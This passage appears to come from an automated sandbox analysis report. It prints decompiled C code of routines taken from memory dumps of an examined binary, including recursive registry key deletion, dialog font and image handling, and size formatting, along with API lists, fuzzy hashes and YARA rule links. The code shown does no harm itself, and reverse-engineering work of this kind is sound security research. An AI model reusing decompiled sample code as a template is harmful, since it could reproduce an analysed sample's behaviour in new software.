                                                                                • GlobalFree.KERNEL32 ref: 004028A1
                                                                                • CloseHandle.KERNEL32(?,?,?,?,000000F0), ref: 004028B9
                                                                                • DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 004028CD
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.642351925.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.642341918.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642363195.0000000000408000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642372741.000000000040A000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642405848.000000000041D000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642426353.000000000042C000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642443972.0000000000435000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642456295.0000000000438000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                                • String ID:
                                                                                • API String ID: 2667972263-0
                                                                                • Opcode ID: 10aa94e9192e65a0b09259698f99f40e5440345eda598c6609a5c103b0ccd052
                                                                                • Instruction ID: 6e19ad8f311a8fe4d121ff6d49c8506e1ed5368105aa9b5939d25a16afe37da6
                                                                                • Opcode Fuzzy Hash: 10aa94e9192e65a0b09259698f99f40e5440345eda598c6609a5c103b0ccd052
                                                                                • Instruction Fuzzy Hash: C0219F72800124BBDF217FA5CE48D9E7E79EF09324F14823EF450762D1CA7949418FA8
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 6F711837, Relevance: 7.7, APIs: 5, Instructions: 194COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 97%
                                                                                			E6F711837(signed int __edx, void* __eflags, void* _a8, void* _a16) {
				void* _v8;
				signed int _v12;
				signed int _v20;
				signed int _v24;
				char _v52;
				void _t45;
				void _t46;
				signed int _t47;
				signed int _t48;
				signed int _t57;
				signed int _t58;
				signed int _t59;
				signed int _t60;
				signed int _t61;
				void* _t67;
				void* _t68;
				void* _t69;
				void* _t70;
				void* _t71;
				signed int _t77;
				void* _t81;
				signed int _t83;
				signed int _t85;
				signed int _t87;
				signed int _t90;
				void* _t101;

				_t85 = __edx;
				 *0x6f71405c = _a8;
				_t77 = 0;
				 *0x6f714060 = _a16;
				_v12 = 0;
				_v8 = E6F71123B();
				_t90 = E6F7112FE(_t42);
				_t87 = _t85;
				_t81 = E6F71123B();
				_a8 = _t81;
				_t45 =  *_t81;
				if(_t45 != 0x7e && _t45 != 0x21) {
					_a16 = E6F71123B();
					_t77 = E6F7112FE(_t74);
					_v12 = _t85;
					GlobalFree(_a16);
					_t81 = _a8;
				}
				_t46 =  *_t81;
				_t101 = _t46 - 0x2f;
				if(_t101 > 0) {
					_t47 = _t46 - 0x3c;
					__eflags = _t47;
					if(_t47 == 0) {
						__eflags =  *((char*)(_t81 + 1)) - 0x3c;
						if( *((char*)(_t81 + 1)) != 0x3c) {
							__eflags = _t87 - _v12;
							if(__eflags > 0) {
								L56:
								_t48 = 0;
								__eflags = 0;
								L57:
								asm("cdq");
								L58:
								_t90 = _t48;
								_t87 = _t85;
								L59:
								E6F711429(_t85, _t90, _t87,  &_v52);
								E6F711266( &_v52);
								GlobalFree(_v8);
								return GlobalFree(_a8);
							}
							if(__eflags < 0) {
								L49:
								__eflags = 0;
								L50:
								_t48 = 1;
								goto L57;
							}
							__eflags = _t90 - _t77;
							if(_t90 < _t77) {
								goto L49;
							}
							goto L56;
						}
						_t85 = _t87;
						_t48 = E6F712EF0(_t90, _t77, _t85);
						goto L58;
					}
					_t57 = _t47 - 1;
					__eflags = _t57;
					if(_t57 == 0) {
						__eflags = _t90 - _t77;
						if(_t90 != _t77) {
							goto L56;
						}
						__eflags = _t87 - _v12;
						if(_t87 != _v12) {
							goto L56;
						}
						goto L49;
					}
					_t58 = _t57 - 1;
					__eflags = _t58;
					if(_t58 == 0) {
						__eflags =  *((char*)(_t81 + 1)) - 0x3e;
						if( *((char*)(_t81 + 1)) != 0x3e) {
							__eflags = _t87 - _v12;
							if(__eflags < 0) {
								goto L56;
							}
							if(__eflags > 0) {
								goto L49;
							}
							__eflags = _t90 - _t77;
							if(_t90 <= _t77) {
								goto L56;
							}
							goto L49;
						}
						__eflags =  *((char*)(_t81 + 2)) - 0x3e;
						_t85 = _t87;
						_t59 = _t90;
						_t83 = _t77;
						if( *((char*)(_t81 + 2)) != 0x3e) {
							_t48 = E6F712F10(_t59, _t83, _t85);
						} else {
							_t48 = E6F712F40(_t59, _t83, _t85);
						}
						goto L58;
					}
					_t60 = _t58 - 0x20;
					__eflags = _t60;
					if(_t60 == 0) {
						_t90 = _t90 ^ _t77;
						_t87 = _t87 ^ _v12;
						goto L59;
					}
					_t61 = _t60 - 0x1e;
					__eflags = _t61;
					if(_t61 == 0) {
						__eflags =  *((char*)(_t81 + 1)) - 0x7c;
						if( *((char*)(_t81 + 1)) != 0x7c) {
							_t90 = _t90 | _t77;
							_t87 = _t87 | _v12;
							goto L59;
						}
						__eflags = _t90 | _t87;
						if((_t90 | _t87) != 0) {
							goto L49;
						}
						__eflags = _t77 | _v12;
						if((_t77 | _v12) != 0) {
							goto L49;
						}
						goto L56;
					}
					__eflags = _t61 == 0;
					if(_t61 == 0) {
						_t90 =  !_t90;
						_t87 =  !_t87;
					}
					goto L59;
				}
				if(_t101 == 0) {
					L21:
					__eflags = _t77 | _v12;
					if((_t77 | _v12) != 0) {
						_v24 = E6F712D80(_t90, _t87, _t77, _v12);
						_v20 = _t85;
						_t48 = E6F712E30(_t90, _t87, _t77, _v12);
						_t81 = _a8;
					} else {
						_v24 = _v24 & 0x00000000;
						_v20 = _v20 & 0x00000000;
						_t48 = _t90;
						_t85 = _t87;
					}
					__eflags =  *_t81 - 0x2f;
					if( *_t81 != 0x2f) {
						goto L58;
					} else {
						_t90 = _v24;
						_t87 = _v20;
						goto L59;
					}
				}
				_t67 = _t46 - 0x21;
				if(_t67 == 0) {
					_t48 = 0;
					__eflags = _t90 | _t87;
					if((_t90 | _t87) != 0) {
						goto L57;
					}
					goto L50;
				}
				_t68 = _t67 - 4;
				if(_t68 == 0) {
					goto L21;
				}
				_t69 = _t68 - 1;
				if(_t69 == 0) {
					__eflags =  *((char*)(_t81 + 1)) - 0x26;
					if( *((char*)(_t81 + 1)) != 0x26) {
						_t90 = _t90 & _t77;
						_t87 = _t87 & _v12;
						goto L59;
					}
					__eflags = _t90 | _t87;
					if((_t90 | _t87) == 0) {
						goto L56;
					}
					__eflags = _t77 | _v12;
					if((_t77 | _v12) == 0) {
						goto L56;
					}
					goto L49;
				}
				_t70 = _t69 - 4;
				if(_t70 == 0) {
					_t48 = E6F712D40(_t90, _t87, _t77, _v12);
					goto L58;
				} else {
					_t71 = _t70 - 1;
					if(_t71 == 0) {
						_t90 = _t90 + _t77;
						asm("adc edi, [ebp-0x8]");
					} else {
						if(_t71 == 0) {
							_t90 = _t90 - _t77;
							asm("sbb edi, [ebp-0x8]");
						}
					}
					goto L59;
				}
			}





























                                                                                0x6f711837
                                                                                0x6f711841
                                                                                0x6f71184a
                                                                                0x6f71184d
                                                                                0x6f711852
                                                                                0x6f71185b
                                                                                0x6f711864
                                                                                0x6f711866
                                                                                0x6f71186d
                                                                                0x6f71186f
                                                                                0x6f711872
                                                                                0x6f711876
                                                                                0x6f711882
                                                                                0x6f71188b
                                                                                0x6f711890
                                                                                0x6f711893
                                                                                0x6f711899
                                                                                0x6f711899
                                                                                0x6f71189c
                                                                                0x6f71189f
                                                                                0x6f7118a2
                                                                                0x6f711968
                                                                                0x6f711968
                                                                                0x6f71196b
                                                                                0x6f7119e5
                                                                                0x6f7119e9
                                                                                0x6f7119f8
                                                                                0x6f7119fb
                                                                                0x6f711a03
                                                                                0x6f711a03
                                                                                0x6f711a03
                                                                                0x6f711a05
                                                                                0x6f711a05
                                                                                0x6f711a06
                                                                                0x6f711a06
                                                                                0x6f711a08
                                                                                0x6f711a0a
                                                                                0x6f711a10
                                                                                0x6f711a19
                                                                                0x6f711a2a
                                                                                0x6f711a35
                                                                                0x6f711a35
                                                                                0x6f7119fd
                                                                                0x6f7119e0
                                                                                0x6f7119e0
                                                                                0x6f7119e2
                                                                                0x6f7119e2
                                                                                0x00000000
                                                                                0x6f7119e2
                                                                                0x6f7119ff
                                                                                0x6f711a01
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x6f711a01
                                                                                0x6f7119ed
                                                                                0x6f7119f1
                                                                                0x00000000
                                                                                0x6f7119f1
                                                                                0x6f71196d
                                                                                0x6f71196d
                                                                                0x6f71196e
                                                                                0x6f7119d7
                                                                                0x6f7119d9
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x6f7119db
                                                                                0x6f7119de
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x6f7119de
                                                                                0x6f711970
                                                                                0x6f711970
                                                                                0x6f711971
                                                                                0x6f7119aa
                                                                                0x6f7119ae
                                                                                0x6f7119ca
                                                                                0x6f7119cd
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x6f7119cf
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x6f7119d1
                                                                                0x6f7119d3
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x6f7119d5
                                                                                0x6f7119b0
                                                                                0x6f7119b4
                                                                                0x6f7119b6
                                                                                0x6f7119b8
                                                                                0x6f7119ba
                                                                                0x6f7119c3
                                                                                0x6f7119bc
                                                                                0x6f7119bc
                                                                                0x6f7119bc
                                                                                0x00000000
                                                                                0x6f7119ba
                                                                                0x6f711973
                                                                                0x6f711973
                                                                                0x6f711976
                                                                                0x6f7119a3
                                                                                0x6f7119a5
                                                                                0x00000000
                                                                                0x6f7119a5
                                                                                0x6f711978
                                                                                0x6f711978
                                                                                0x6f71197b
                                                                                0x6f71198b
                                                                                0x6f71198f
                                                                                0x6f71199c
                                                                                0x6f71199e
                                                                                0x00000000
                                                                                0x6f71199e
                                                                                0x6f711991
                                                                                0x6f711993
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x6f711995
                                                                                0x6f711998
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x6f71199a
                                                                                0x6f71197e
                                                                                0x6f71197f
                                                                                0x6f711985
                                                                                0x6f711987
                                                                                0x6f711987
                                                                                0x00000000
                                                                                0x6f71197f
                                                                                0x6f7118a8
                                                                                0x6f711920
                                                                                0x6f711922
                                                                                0x6f711925
                                                                                0x6f711943
                                                                                0x6f711946
                                                                                0x6f71194c
                                                                                0x6f711951
                                                                                0x6f711927
                                                                                0x6f711927
                                                                                0x6f71192b
                                                                                0x6f71192f
                                                                                0x6f711931
                                                                                0x6f711931
                                                                                0x6f711954
                                                                                0x6f711957
                                                                                0x00000000
                                                                                0x6f71195d
                                                                                0x6f71195d
                                                                                0x6f711960
                                                                                0x00000000
                                                                                0x6f711960
                                                                                0x6f711957
                                                                                0x6f7118aa
                                                                                0x6f7118ad
                                                                                0x6f711911
                                                                                0x6f711913
                                                                                0x6f711915
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x6f71191b
                                                                                0x6f7118af
                                                                                0x6f7118b2
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x6f7118b4
                                                                                0x6f7118b5
                                                                                0x6f7118eb
                                                                                0x6f7118ef
                                                                                0x6f711907
                                                                                0x6f711909
                                                                                0x00000000
                                                                                0x6f711909
                                                                                0x6f7118f1
                                                                                0x6f7118f3
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x6f7118f9
                                                                                0x6f7118fc
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x6f711902
                                                                                0x6f7118b7
                                                                                0x6f7118ba
                                                                                0x6f7118e1
                                                                                0x00000000
                                                                                0x6f7118bc
                                                                                0x6f7118bc
                                                                                0x6f7118bd
                                                                                0x6f7118d1
                                                                                0x6f7118d3
                                                                                0x6f7118bf
                                                                                0x6f7118c1
                                                                                0x6f7118c7
                                                                                0x6f7118c9
                                                                                0x6f7118c9
                                                                                0x6f7118c1
                                                                                0x00000000
                                                                                0x6f7118bd

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.644261390.000000006F711000.00000020.00020000.sdmp, Offset: 6F710000, based on PE: true
                                                                                • Associated: 00000000.00000002.644238585.000000006F710000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.644270262.000000006F713000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.644290951.000000006F715000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: FreeGlobal
                                                                                • String ID:
                                                                                • API String ID: 2979337801-0
                                                                                • Opcode ID: 578c0b6e3eaa40bb8ff17867c236bdf059bc26c0eceda2eb526b78d42e3d51ac
                                                                                • Instruction ID: 9dccba2efb26303ab371e67523ed54f4d7092c88b321d9feb07b2a9efb0943ba
                                                                                • Opcode Fuzzy Hash: 578c0b6e3eaa40bb8ff17867c236bdf059bc26c0eceda2eb526b78d42e3d51ac
                                                                                • Instruction Fuzzy Hash: 9151D43190C198AB9B00CFB8C7449AEBFBDAB66359F0C426BD410AE140C2F1A94D87A1
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00402CD0, Relevance: 7.6, APIs: 5, Instructions: 84registryCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 48%
                                                                                			E00402CD0(void* __eflags, void* _a4, char* _a8, signed int _a12) {
				void* _v8;
				int _v12;
				char _v276;
				void* _t27;
				signed int _t33;
				intOrPtr* _t35;
				signed int _t45;
				signed int _t46;
				signed int _t47;

				_t46 = _a12;
				_t47 = _t46 & 0x00000300;
				_t45 = _t46 & 0x00000001;
				_t27 = E004060D3(__eflags, _a4, _a8, _t47 | 0x00000009,  &_v8);
				if(_t27 == 0) {
					if((_a12 & 0x00000002) == 0) {
						L3:
						_push(0x105);
						_push( &_v276);
						_push(0);
						while(RegEnumKeyA(_v8, ??, ??, ??) == 0) {
							__eflags = _t45;
							if(__eflags != 0) {
								L10:
								RegCloseKey(_v8);
								return 0x3eb;
							}
							_t33 = E00402CD0(__eflags, _v8,  &_v276, _a12);
							__eflags = _t33;
							if(_t33 != 0) {
								break;
							}
							_push(0x105);
							_push( &_v276);
							_push(_t45);
						}
						RegCloseKey(_v8);
						_t35 = E00406656(3);
						if(_t35 != 0) {
							return  *_t35(_a4, _a8, _t47, 0);
						}
						return RegDeleteKeyA(_a4, _a8);
					}
					_v12 = 0;
					if(RegEnumValueA(_v8, 0,  &_v276,  &_v12, 0, 0, 0, 0) != 0x103) {
						goto L10;
					}
					goto L3;
				}
				return _t27;
			}












                                                                                0x00402cdb
                                                                                0x00402ce4
                                                                                0x00402ced
                                                                                0x00402cf9
                                                                                0x00402d02
                                                                                0x00402d0c
                                                                                0x00402d31
                                                                                0x00402d37
                                                                                0x00402d3c
                                                                                0x00402d3d
                                                                                0x00402d6d
                                                                                0x00402d46
                                                                                0x00402d48
                                                                                0x00402d98
                                                                                0x00402d9b
                                                                                0x00000000
                                                                                0x00402da1
                                                                                0x00402d57
                                                                                0x00402d5c
                                                                                0x00402d5e
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00402d66
                                                                                0x00402d6b
                                                                                0x00402d6c
                                                                                0x00402d6c
                                                                                0x00402d79
                                                                                0x00402d81
                                                                                0x00402d88
                                                                                0x00000000
                                                                                0x00402db1
                                                                                0x00000000
                                                                                0x00402d90
                                                                                0x00402d1c
                                                                                0x00402d2f
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00402d2f
                                                                                0x00402db7

                                                                                APIs
                                                                                • RegEnumValueA.ADVAPI32 ref: 00402D24
                                                                                • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402D70
                                                                                • RegCloseKey.ADVAPI32(?,?,?), ref: 00402D79
                                                                                • RegDeleteKeyA.ADVAPI32(?,?), ref: 00402D90
                                                                                • RegCloseKey.ADVAPI32(?,?,?), ref: 00402D9B
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.642351925.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.642341918.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642363195.0000000000408000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642372741.000000000040A000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642405848.000000000041D000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642426353.000000000042C000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642443972.0000000000435000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642456295.0000000000438000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: CloseEnum$DeleteValue
                                                                                • String ID:
                                                                                • API String ID: 1354259210-0
                                                                                • Opcode ID: 681fed8778fb2982ecb5527b851c998c3744aa6ef2e2e43ab789fcfdd1fcd395
                                                                                • Instruction ID: d75478e88f471254037528958efdeb905634950da4f4823c7bb408bf4a1a64a1
                                                                                • Opcode Fuzzy Hash: 681fed8778fb2982ecb5527b851c998c3744aa6ef2e2e43ab789fcfdd1fcd395
                                                                                • Instruction Fuzzy Hash: 44215771900108BBEF129F90CE89EEE7A7DEF44344F100476FA55B11A0E7B48E54AA68
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00401D65, Relevance: 7.6, APIs: 5, Instructions: 75windowCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 77%
                                                                                			E00401D65(void* __ebx, void* __edx) {
				struct HWND__* _t30;
				CHAR* _t38;
				void* _t48;
				void* _t53;
				signed int _t55;
				signed int _t58;
				long _t61;
				void* _t65;

				_t53 = __ebx;
				if(( *(_t65 - 0x1b) & 0x00000001) == 0) {
					_t30 = GetDlgItem( *(_t65 - 8),  *(_t65 - 0x20));
				} else {
					E00402BAC(2);
					 *((intOrPtr*)(__ebp - 0x38)) = __edx;
				}
				_t55 =  *(_t65 - 0x1c);
				 *(_t65 + 8) = _t30;
				_t58 = _t55 & 0x00000004;
				 *(_t65 - 0xc) = _t55 & 0x00000003;
				 *(_t65 - 0x34) = _t55 >> 0x1f;
				 *(_t65 - 0x30) = _t55 >> 0x0000001e & 0x00000001;
				if((_t55 & 0x00010000) == 0) {
					_t38 =  *(_t65 - 0x24) & 0x0000ffff;
				} else {
					_t38 = E00402BCE(0x11);
				}
				 *(_t65 - 8) = _t38;
				GetClientRect( *(_t65 + 8), _t65 - 0x84);
				asm("sbb edi, edi");
				_t61 = LoadImageA( ~_t58 &  *0x42f440,  *(_t65 - 8),  *(_t65 - 0xc),  *(_t65 - 0x7c) *  *(_t65 - 0x34),  *(_t65 - 0x78) *  *(_t65 - 0x30),  *(_t65 - 0x1c) & 0x0000fef0);
				_t48 = SendMessageA( *(_t65 + 8), 0x172,  *(_t65 - 0xc), _t61);
				if(_t48 != _t53 &&  *(_t65 - 0xc) == _t53) {
					DeleteObject(_t48);
				}
				if( *((intOrPtr*)(_t65 - 0x28)) >= _t53) {
					_push(_t61);
					E004061AB();
				}
				 *0x42f4e8 =  *0x42f4e8 +  *((intOrPtr*)(_t65 - 4));
				return 0;
			}











                                                                                0x00401d65
                                                                                0x00401d69
                                                                                0x00401d7e
                                                                                0x00401d6b
                                                                                0x00401d6d
                                                                                0x00401d73
                                                                                0x00401d73
                                                                                0x00401d84
                                                                                0x00401d87
                                                                                0x00401d91
                                                                                0x00401d94
                                                                                0x00401d9c
                                                                                0x00401dad
                                                                                0x00401db0
                                                                                0x00401dbb
                                                                                0x00401db2
                                                                                0x00401db4
                                                                                0x00401db4
                                                                                0x00401dbf
                                                                                0x00401dcc
                                                                                0x00401df3
                                                                                0x00401e02
                                                                                0x00401e10
                                                                                0x00401e18
                                                                                0x00401e20
                                                                                0x00401e20
                                                                                0x00401e29
                                                                                0x00401e2f
                                                                                0x004029a5
                                                                                0x004029a5
                                                                                0x00402a5d
                                                                                0x00402a69

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.642351925.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.642341918.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642363195.0000000000408000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642372741.000000000040A000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642405848.000000000041D000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642426353.000000000042C000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642443972.0000000000435000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642456295.0000000000438000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                • String ID:
                                                                                • API String ID: 1849352358-0
                                                                                • Opcode ID: 9d39b7960c4b589ca11e41561aab3825f23cbdbd0ce465e9420b3b3e566fd9b2
                                                                                • Instruction ID: af2208a9c993d9ce4f8579721101e2d802b93c806783de9e53f89228710c5587
                                                                                • Opcode Fuzzy Hash: 9d39b7960c4b589ca11e41561aab3825f23cbdbd0ce465e9420b3b3e566fd9b2
                                                                                • Instruction Fuzzy Hash: EA212A72E00109AFCF15DFA4DD85AAEBBB5EB48304F24407EF901F62A1CB389951DB54
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00401E35, Relevance: 7.5, APIs: 5, Instructions: 43COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 73%
                                                                                			E00401E35(intOrPtr __edx) {
				void* __esi;
				int _t9;
				signed char _t15;
				struct HFONT__* _t18;
				intOrPtr _t30;
				struct HDC__* _t31;
				void* _t33;
				void* _t35;

				_t30 = __edx;
				_t31 = GetDC( *(_t35 - 8));
				_t9 = E00402BAC(2);
				 *((intOrPtr*)(_t35 - 0x38)) = _t30;
				0x40b850->lfHeight =  ~(MulDiv(_t9, GetDeviceCaps(_t31, 0x5a), 0x48));
				ReleaseDC( *(_t35 - 8), _t31);
				 *0x40b860 = E00402BAC(3);
				_t15 =  *((intOrPtr*)(_t35 - 0x18));
				 *((intOrPtr*)(_t35 - 0x38)) = _t30;
				 *0x40b867 = 1;
				 *0x40b864 = _t15 & 0x00000001;
				 *0x40b865 = _t15 & 0x00000002;
				 *0x40b866 = _t15 & 0x00000004;
				E004062E0(_t9, _t31, _t33, 0x40b86c,  *((intOrPtr*)(_t35 - 0x24)));
				_t18 = CreateFontIndirectA(0x40b850);
				_push(_t18);
				_push(_t33);
				E004061AB();
				 *0x42f4e8 =  *0x42f4e8 +  *((intOrPtr*)(_t35 - 4));
				return 0;
			}











                                                                                0x00401e35
                                                                                0x00401e40
                                                                                0x00401e42
                                                                                0x00401e4f
                                                                                0x00401e66
                                                                                0x00401e6b
                                                                                0x00401e78
                                                                                0x00401e7d
                                                                                0x00401e81
                                                                                0x00401e8c
                                                                                0x00401e93
                                                                                0x00401ea5
                                                                                0x00401eab
                                                                                0x00401eb0
                                                                                0x00401eba
                                                                                0x00402620
                                                                                0x00401569
                                                                                0x004029a5
                                                                                0x00402a5d
                                                                                0x00402a69

                                                                                APIs
                                                                                • GetDC.USER32(?), ref: 00401E38
                                                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E52
                                                                                • MulDiv.KERNEL32(00000000,00000000), ref: 00401E5A
                                                                                • ReleaseDC.USER32 ref: 00401E6B
                                                                                • CreateFontIndirectA.GDI32(0040B850), ref: 00401EBA
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.642351925.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.642341918.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642363195.0000000000408000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642372741.000000000040A000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642405848.000000000041D000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642426353.000000000042C000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642443972.0000000000435000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642456295.0000000000438000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: CapsCreateDeviceFontIndirectRelease
                                                                                • String ID:
                                                                                • API String ID: 3808545654-0
                                                                                • Opcode ID: d1cbb2668a8e0048c904ace968a64d6fe2784e3b1926127080350a50dd5622c8
                                                                                • Instruction ID: bda7ea4a963eadc9936f181c2ed760bd7850ebe674c1e58b805f7706cadb7525
                                                                                • Opcode Fuzzy Hash: d1cbb2668a8e0048c904ace968a64d6fe2784e3b1926127080350a50dd5622c8
                                                                                • Instruction Fuzzy Hash: A3016D72504248AEE7007BB1AE4AA9A3FF8E755301F10887AF141B61F2CB7804458B6C
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00404B1A, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84stringCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 77%
                                                                                			E00404B1A(int _a4, intOrPtr _a8, signed int _a12, signed int _a16) {
				char _v36;
				char _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t21;
				signed int _t22;
				void* _t29;
				void* _t31;
				void* _t32;
				void* _t41;
				signed int _t43;
				signed int _t47;
				signed int _t50;
				signed int _t51;
				signed int _t53;

				_t21 = _a16;
				_t51 = _a12;
				_t41 = 0xffffffdc;
				if(_t21 == 0) {
					_push(0x14);
					_pop(0);
					_t22 = _t51;
					if(_t51 < 0x100000) {
						_push(0xa);
						_pop(0);
						_t41 = 0xffffffdd;
					}
					if(_t51 < 0x400) {
						_t41 = 0xffffffde;
					}
					if(_t51 < 0xffff3333) {
						_t50 = 0x14;
						asm("cdq");
						_t22 = 1 / _t50 + _t51;
					}
					_t23 = _t22 & 0x00ffffff;
					_t53 = _t22 >> 0;
					_t43 = 0xa;
					_t47 = ((_t22 & 0x00ffffff) + _t23 * 4 + (_t22 & 0x00ffffff) + _t23 * 4 >> 0) % _t43;
				} else {
					_t53 = (_t21 << 0x00000020 | _t51) >> 0x14;
					_t47 = 0;
				}
				_t29 = E004062E0(_t41, _t47, _t53,  &_v36, 0xffffffdf);
				_t31 = E004062E0(_t41, _t47, _t53,  &_v68, _t41);
				_t32 = E004062E0(_t41, _t47, 0x42a8b8, 0x42a8b8, _a8);
				wsprintfA(_t32 + lstrlenA(0x42a8b8), "%u.%u%s%s", _t53, _t47, _t31, _t29);
				return SetDlgItemTextA( *0x42ec18, _a4, 0x42a8b8);
			}



















                                                                                0x00404b20
                                                                                0x00404b25
                                                                                0x00404b2d
                                                                                0x00404b2e
                                                                                0x00404b3b
                                                                                0x00404b43
                                                                                0x00404b44
                                                                                0x00404b46
                                                                                0x00404b48
                                                                                0x00404b4a
                                                                                0x00404b4d
                                                                                0x00404b4d
                                                                                0x00404b54
                                                                                0x00404b5a
                                                                                0x00404b5a
                                                                                0x00404b61
                                                                                0x00404b68
                                                                                0x00404b6b
                                                                                0x00404b6e
                                                                                0x00404b6e
                                                                                0x00404b72
                                                                                0x00404b82
                                                                                0x00404b84
                                                                                0x00404b87
                                                                                0x00404b30
                                                                                0x00404b30
                                                                                0x00404b37
                                                                                0x00404b37
                                                                                0x00404b8f
                                                                                0x00404b9a
                                                                                0x00404bb0
                                                                                0x00404bc0
                                                                                0x00404bdc

                                                                                APIs
                                                                                • lstrlenA.KERNEL32(0042A8B8,0042A8B8,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404A35,000000DF,00000000,00000400,?), ref: 00404BB8
                                                                                • wsprintfA.USER32 ref: 00404BC0
                                                                                • SetDlgItemTextA.USER32 ref: 00404BD3
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.642351925.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.642341918.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642363195.0000000000408000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642372741.000000000040A000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642405848.000000000041D000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642426353.000000000042C000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642443972.0000000000435000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642456295.0000000000438000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: ItemTextlstrlenwsprintf
                                                                                • String ID: %u.%u%s%s
                                                                                • API String ID: 3540041739-3551169577
                                                                                • Opcode ID: 08f9c178ad4fdce5ba5a134203cc09d67d66b4423bbb0e6013138279e3fed682
                                                                                • Instruction ID: 2e00c39cbbb7080f6c78f9bc89fda30cce30f66f6b884b1aab771d4f97bc656b
                                                                                • Opcode Fuzzy Hash: 08f9c178ad4fdce5ba5a134203cc09d67d66b4423bbb0e6013138279e3fed682
